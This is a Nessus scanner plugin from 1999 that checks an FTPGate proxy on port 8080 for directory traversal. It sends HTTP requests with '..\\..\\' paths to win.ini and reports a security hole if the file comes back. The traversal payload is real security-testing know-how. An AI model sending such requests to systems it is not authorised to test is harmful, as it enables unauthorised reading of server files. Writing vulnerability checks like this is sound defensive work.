home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ftpgate.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  88 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10091);
  10.  script_version ("$Revision: 1.12 $");
  11.  
  12.  name["english"] = "FTPGate traversal";
  13.  name["francais"] = "FTPGate traversal";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "
  17. It is possible to read arbitrary files on
  18. the remote server by prepending ../../
  19. or ..\..\ in front on the file name.
  20.  
  21. Solution : Use another web proxy
  22. Risk factor : High";
  23.  
  24.  desc["francais"] = "Il est possible de lire
  25. n'importe quel fichier sur la machine distante
  26. en ajoutant des points devant leur noms,
  27. tels que ../../ ou ..\..\.
  28.  
  29.  
  30. Solution : dΘsactivez ce service et installez
  31. un vrai proxy
  32.  
  33. Facteur de risque : ElevΘ";
  34.  
  35.  script_description(english:desc["english"], francais:desc["francais"]);
  36.  
  37.  summary["english"] = "\..\..\file.txt";
  38.  summary["francais"] = "\..\..\file.txt";
  39.  script_summary(english:summary["english"], francais:summary["francais"]);
  40.  
  41.  script_category(ACT_GATHER_INFO);
  42.  
  43.  
  44.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  45.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  46.  family["english"] = "Remote file access";
  47.  family["francais"] = "AccΦs aux fichiers distants";
  48.  script_family(english:family["english"], francais:family["francais"]);
  49.  script_dependencie("find_service.nes");
  50.  script_require_ports(8080);
  51.  exit(0);
  52. }
  53.  
  54. #
  55. # The script code starts here
  56. #
  57.  
  58. include("http_func.inc");
  59. port = 8080;
  60.  
  61. if(get_port_state(port))
  62. {
  63. req1 = http_get(item:"..\\..\\..\\..\\..\\..\\windows\\win.ini", port:port);
  64. req2 = http_get(item:"..\\..\\..\\..\\..\\..\\winnt\\win.ini", port:port);
  65.  
  66.  
  67. soc = http_open_socket(port);
  68. if(soc)
  69. {
  70.  send(socket:soc, data:req1);
  71.  r = http_recv(socket:soc);
  72.  http_close_socket(soc);
  73.  if("[windows]" >< r){
  74.      security_hole(port);
  75.     exit(0);
  76.     }
  77.  soc2 = http_open_socket(port);
  78.  if(!soc2)exit(0);
  79.  send(socket:soc2, data:req2);
  80.  r = http_recv(socket:soc2);
  81.  http_close_socket(soc2);
  82.  if("[fonts]" >< r){
  83.      security_hole(port);
  84.     exit(0);
  85.     }
  86.  }
  87. }
  88.